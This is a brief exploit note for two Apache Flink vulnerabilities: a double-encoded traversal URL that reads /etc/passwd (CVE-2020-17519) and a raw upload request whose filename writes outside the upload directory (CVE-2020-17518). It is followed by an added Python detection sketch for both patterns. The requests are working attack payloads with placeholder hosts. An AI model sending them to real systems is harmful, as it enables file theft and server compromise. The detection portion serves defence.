CVE-2020-17519

Arbitrary file read:

    https://xx.xx.xx.xx/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

CVE-2020-17518

Reuse the PoC directly:

    POST /jars/upload HTTP/1.1
    Host: xx.xx.xx.xx
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Connection: close
    Content-Type: multipart/form-data; boundary=--------721072898
    Content-Length: 151

    ----------721072898
    Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../tmp/test.txt"

    testtest
    ----------721072898--

Test whether the upload succeeded

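Detection sketch for both requests shown above, added here as an example and not part of the original write-up: it flags `/jobmanager/logs/` paths that decode to `..` segments (CVE-2020-17519) and `/jars/upload` bodies whose multipart filename carries directory components (CVE-2020-17518). The function names are hypothetical, and it assumes the request path and body are available from a proxy or WAF in front of the Flink REST API.

```python
import re
from urllib.parse import unquote

# A ".." path segment, delimited by "/" or "\" or the end of the string.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
FILENAME = re.compile(rb'filename="([^"]*)"', re.IGNORECASE)


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable, so %252f -> %2f -> / is seen as a slash."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_log_request(path):
    """True if a /jobmanager/logs/ request decodes to a path with '..' segments."""
    decoded = fully_decode(path)
    return decoded.startswith("/jobmanager/logs/") and bool(TRAVERSAL.search(decoded))


def flag_upload(path, body):
    """True if a /jars/upload body has a multipart filename with directory parts."""
    if not path.startswith("/jars/upload"):
        return False
    for match in FILENAME.finditer(body):
        name = fully_decode(match.group(1).decode("latin-1"))
        if "/" in name or "\\" in name:
            return True
    return False


# Request path and filename as they appear on this page.
PAGE_LOG_PATH = "/jobmanager/logs/" + "..%252f" * 10 + "etc%252fpasswd"
PAGE_UPLOAD = b'Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../tmp/test.txt"'
# Constructed benign samples for comparison.
BENIGN_LOG_PATH = "/jobmanager/logs/jobmanager.log"
BENIGN_UPLOAD = b'Content-Disposition: form-data; name="jarfile"; filename="example.jar"'

if __name__ == "__main__":
    for p in (PAGE_LOG_PATH, BENIGN_LOG_PATH):
        print(flag_log_request(p), p)
    for b in (PAGE_UPLOAD, BENIGN_UPLOAD):
        print(flag_upload("/jars/upload", b), b.decode())
```

Decoding repeatedly before matching matters here: a filter that decodes only once sees `..%2f` and misses the traversal.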